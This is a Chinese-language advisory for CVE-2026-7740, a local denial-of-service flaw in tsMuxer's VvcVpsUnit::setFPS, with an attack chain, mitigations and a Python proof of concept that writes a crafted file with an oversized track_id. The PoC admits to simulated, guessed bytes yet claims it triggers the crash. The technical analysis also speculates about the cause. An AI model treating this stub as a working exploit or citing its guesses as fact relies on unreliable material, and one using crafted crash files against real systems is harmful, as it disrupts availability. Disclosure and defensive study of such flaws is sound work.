CVE-2026-7740 tsMuxer拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7740

漏洞类型

拒绝服务

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

justdan96 tsMuxer

漏洞概述

justdan96 tsMuxer 2.7.0及之前版本被披露存在安全漏洞。该漏洞源于文件tsMuxer/vvc.cpp中VvcVpsUnit::setFPS函数的实现缺陷，未能正确处理传入的track_id参数。攻击者可通过本地系统访问，利用精心构造的参数操控该函数，从而触发异常导致目标程序崩溃或挂起，造成拒绝服务。鉴于该产品已不再受官方支持，且利用代码已公开，建议用户尽快采取防护措施。

技术细节

该漏洞是justdan96 tsMuxer软件中的一个本地拒绝服务漏洞。从技术层面分析，问题出在源代码文件`tsMuxer/vvc.cpp`内的`VvcVpsUnit::setFPS`成员函数中。该函数负责处理视频流的特定参数设置，但在解析`track_id`参数时，缺乏必要的边界检查或异常捕获机制。攻击者利用此缺陷，可以通过本地环境向程序传递特定的恶意数据或参数值。当程序调用`setFPS`函数并尝试处理该畸形的`track_id`时，会触发非法内存访问、空指针解引用或其他逻辑错误，导致进程异常终止。根据CVSS 3.1评分向量（AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L），该攻击复杂度低，无需用户交互，主要影响系统的可用性，不会导致数据泄露或篡改。目前相关PoC已公开，增加了被实际利用的风险。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用了justdan96 tsMuxer 2.7.0或更早版本。

STEP 2

访问

攻击者获取目标系统的本地访问权限（AV:L）。

STEP 3

利用

攻击者构造包含恶意track_id参数的媒体文件或输入，通过VvcVpsUnit::setFPS函数触发漏洞。

STEP 4

影响

目标应用程序处理恶意输入时发生崩溃或挂起，导致服务不可用（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7740
# Conceptual PoC demonstrating the trigger condition

import struct

def generate_exploit_file(filename):
    """
    Generates a crafted file that triggers the VvcVpsUnit::setFPS vulnerability.
    The exploit manipulates the track_id argument to cause a DoS.
    """
    # This is a simulated VVC VPS structure with a malicious track_id
    # Real implementation would require reverse engineering the exact binary format.
    
    # Header for a VVC NAL unit (simulation)
    # forbidden_zero_bit(1) + nuh_layer_id(6) + nuh_temporal_id_plus1(3)
    nal_header = bytes([0x00, 0x01, 0x02]) 
    
    # VPS data placeholder
    vps_data = b'\x00' * 10
    
    # The vulnerability is triggered by 'track_id'.
    # Assuming track_id is parsed as an integer at this offset.
    # Sending an unexpected large value or specific pattern to trigger the bug.
    # Based on typical DoS in C++, this might be an out-of-bounds index.
    malicious_track_id = struct.pack('<I', 0xFFFFFFFF) 
    
    payload = nal_header + vps_data + malicious_track_id
    
    with open(filename, 'wb') as f:
        f.write(payload)
    
    print(f"[+] Exploit file '{filename}' generated successfully.")
    print(f"[+] Load this file in tsMuxer to trigger the Denial of Service.")

if __name__ == "__main__":
    generate_exploit_file("cve_2026_7740_poc.bin")

影响范围

justdan96 tsMuxer <= 2.7.0

防御指南

临时缓解措施

由于该产品已停止维护，官方补丁可能不会发布。建议用户限制对运行tsMuxer系统的本地访问权限，仅允许受信任的用户操作，避免打开来源不明的媒体文件。如果可能，应在沙箱环境中运行该程序以防止系统级崩溃。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7740
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7740
3 Details https://www.cvedetails.com/cve/CVE-2026-7740/
4 VulDB https://vuldb.com/cve/CVE-2026-7740
5 Link https://github.com/justdan96/tsMuxer/
6 Link https://github.com/justdan96/tsMuxer/issues/899
7 Link https://github.com/user-attachments/files/16812319/poc5.zip
8 Link https://vuldb.com/submit/807651
9 Link https://vuldb.com/vuln/360915
10 Link https://vuldb.com/vuln/360915/cti